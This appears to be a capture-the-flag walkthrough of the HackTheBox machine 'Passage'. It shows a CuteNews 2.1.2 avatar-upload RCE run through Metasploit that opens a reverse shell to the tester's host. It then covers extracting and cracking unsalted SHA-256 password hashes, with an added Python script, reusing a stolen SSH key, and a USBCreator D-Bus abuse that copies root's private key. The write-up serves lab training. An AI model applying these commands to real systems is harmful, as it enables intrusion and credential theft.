#summary

  • OS: Linux
  • Difficulty: Medium
  • Points: 30
  • Release: 05 Sep 2020
  • IP: 10.10.10.206

Bloods claimed on Passage

User Blood: qtc 00 days, 00 hours, 19 mins, 35 seconds.

Root Blood: Lemming 00 days, 00 hours, 32 mins, 04 seconds.



#reconnaissance

| nmap

As usual, I start with nmap.

[email protected]:~/Desktop/HTB/passage$ nmap -A -sV -sC -v -oN passage_nmap --min-rate=10000 10.10.10.206

A few seconds later I get the report:

Not much open, but enough. Let's look at port 80.

Making host entries:



#enumeration

| web

The page footer identifies the site as CuteNews CMS. Second, URL fuzzing is not an option here: fail2ban bans the source IP after a burst of requests.

Walking through the site, we find the login page and learn that the site runs CuteNews version 2.1.2.

Register an account here, then look for exploits with searchsploit:

[email protected]:~/Desktop/HTB/passage$ searchsploit cutenews 2.1.2

which finds:



#exploitation

| cutenews-rce

In the Personal options page there is an avatar upload for my profile:

So I'll try "CuteNews 2.1.2 – 'avatar' Remote Code Execution" (EDB-ID 46698, a Metasploit module). First, find the module tree of the installed Metasploit:

locate metasploit | grep "multi/"

Go to /usr/share/metasploit-framework/modules/exploits/multi/http/ and copy the exploit there with searchsploit (Metasploit also loads custom modules placed under ~/.msf4/modules/ in the same directory layout, which avoids writing into the system install):

searchsploit -m 46698

Rename it, for example:

sudo mv 46698.rb cutenews_212_rce.rb

The script as published has a syntax error: the References entry below is missing its trailing comma, so add it:

['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],


Start msfconsole and configure the module:

msf5 > search cutenews
msf5 > use 0
msf5 exploit(multi/http/cutenews_212_rce) > set RHOSTS 10.10.10.206
msf5 exploit(multi/http/cutenews_212_rce) > set PASSWORD 123321!@#
msf5 exploit(multi/http/cutenews_212_rce) > set USERNAME user
msf5 exploit(multi/http/cutenews_212_rce) > run

USERNAME and PASSWORD are the account I registered on the site. Don't forget to check your LHOST 🙂


msf5 exploit(multi/http/cutenews_212_rce) > run

[*] Started reverse TCP handler on 10.10.19.30:4444
[*] http://10.10.10.206:80 - CuteNews is 2.1.2
[+] Authentication was successful with user: user
[*] Trying to upload kgxhvyei.php
[+] Upload successfully.
[*] Sending stage (38288 bytes) to 10.10.10.206
[*] Meterpreter session 1 opened (10.10.19.30:4444 -> 10.10.10.206:33594) at 2020-09-16 23:43:29 -0400

meterpreter > shell
Process 2351 created.
Channel 0 created.
whoami
www-data

Then upgrade to a TTY: python -c "import pty; pty.spawn('/bin/bash')"



#privilege escalation



| user

Looking around, the machine has two users under /home:
* nadav
* paul
We can list paul's directory, which contains user.txt, but nadav's home is not listable.

After more enumeration I found the CuteNews user database in /var/www/html/CuteNews/cdata/users: files of base64-encoded lines behind a PHP guard line. Let's decode them:

for line in $(cat * | grep -v php); do echo -n "$line" | base64 -d; echo; done


Pay attention to these lines:

hashid and CyberChef both identify the 64-character hex values as SHA-256. They are unsalted, so they crack quickly.

Crack the hashes with john: sudo john --format=Raw-SHA256 paul.hash

[email protected]:atlanta1

Switching to paul with that password gives me user.txt in the console.
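The decode-then-crack step above in one script, as an added example that is not part of the original write-up. It builds a constructed cdata/users-style file inline (the record layout is an assumption modelled on CuteNews' PHP serialize() output; the e-mails, names and passwords are made up), pulls out every email/SHA-256 pair, writes john-style lines, and runs the same unsalted dictionary attack john does with --format=Raw-SHA256:

```python
import base64
import hashlib
import re
from typing import Dict, List


def sha256_hex(text: str) -> str:
    """Raw SHA-256 of a UTF-8 string as lowercase hex (the password format seen in cdata/users)."""
    return hashlib.sha256(text.encode()).hexdigest()


def _make_record(email: str, name: str, password: str) -> str:
    """Build one constructed user record: a PHP serialize()-style array, base64-encoded.
    Assumption: this mirrors the CuteNews cdata/users layout; it is not copied from the box."""
    serialized = (
        'a:1:{s:5:"email";a:1:{s:%d:"%s";a:3:{'
        's:4:"name";s:%d:"%s";'
        's:5:"email";s:%d:"%s";'
        's:4:"pass";s:64:"%s";}}}'
        % (len(email), email, len(name), name, len(email), email, sha256_hex(password))
    )
    return base64.b64encode(serialized.encode()).decode()


# Constructed sample file: a PHP guard line, one base64 record per line, plus a junk line.
SAMPLE_USERS_FILE = "\n".join([
    "<?php die('Direct call - access denied'); ?>",
    _make_record("paul@example.test", "paul", "atlanta1"),
    _make_record("nadav@example.test", "nadav", "correct-horse-battery-staple"),
    "not base64 at all!!",
])

# Matches the email/pass pair inside a decoded record.
RECORD_RE = re.compile(r's:5:"email";s:\d+:"([^"]+)";s:4:"pass";s:64:"([0-9a-f]{64})"')


def extract_hashes(users_file: str) -> Dict[str, str]:
    """Decode every base64 line (skipping the PHP guard and junk) and return {email: sha256_hex}."""
    found: Dict[str, str] = {}
    for raw in users_file.splitlines():
        line = raw.strip()
        if not line or line.startswith("<?php"):
            continue
        try:
            decoded = base64.b64decode(line, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for email, digest in RECORD_RE.findall(decoded):
            found[email] = digest
    return found


def john_lines(hashes: Dict[str, str]) -> List[str]:
    """Format as 'email:hash' lines, i.e. an input file for john --format=Raw-SHA256."""
    return [f"{email}:{digest}" for email, digest in sorted(hashes.items())]


def crack(hashes: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Dictionary attack on unsalted SHA-256: hash each candidate once, then look up every target."""
    lookup = {sha256_hex(word): word for word in wordlist}
    return {email: lookup[digest] for email, digest in hashes.items() if digest in lookup}


if __name__ == "__main__":
    hashes = extract_hashes(SAMPLE_USERS_FILE)
    print("\n".join(john_lines(hashes)))
    print(crack(hashes, ["password", "123456", "atlanta1", "letmein"]))
```

Because the hashes are unsalted, one wordlist pass hashes each candidate once and checks it against every user at the same time, which is why john finishes in seconds here.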


| user2

In ~/.ssh there is a private key, id_rsa. I copied it to my machine and did:

[email protected]:/tmp$ chmod 600 paul_id_rsa
[email protected]:/tmp$ ssh -i paul_id_rsa [email protected]

The public key in paul's authorized_keys is labelled as nadav's, so nadav can ssh in as paul without a password. If the same key pair also sits in paul's ~/.ssh, the id_rsa we just copied should let paul in as nadav as well:

ssh [email protected]

And it works! 😉


| root

Here I enumerate SUID binaries:

find / -perm -u=s -type f 2>/dev/null


Among them is a sensitive one: dbus-daemon-launch-helper.

Googling "gdbus privilege escalation" leads to:

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.


Use it to copy root's private key somewhere readable, then log in with it:

[email protected]:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_rsa true

Last step: ssh in as root with that key and read root.txt.



#thanks

Last modified: 28.06.2021
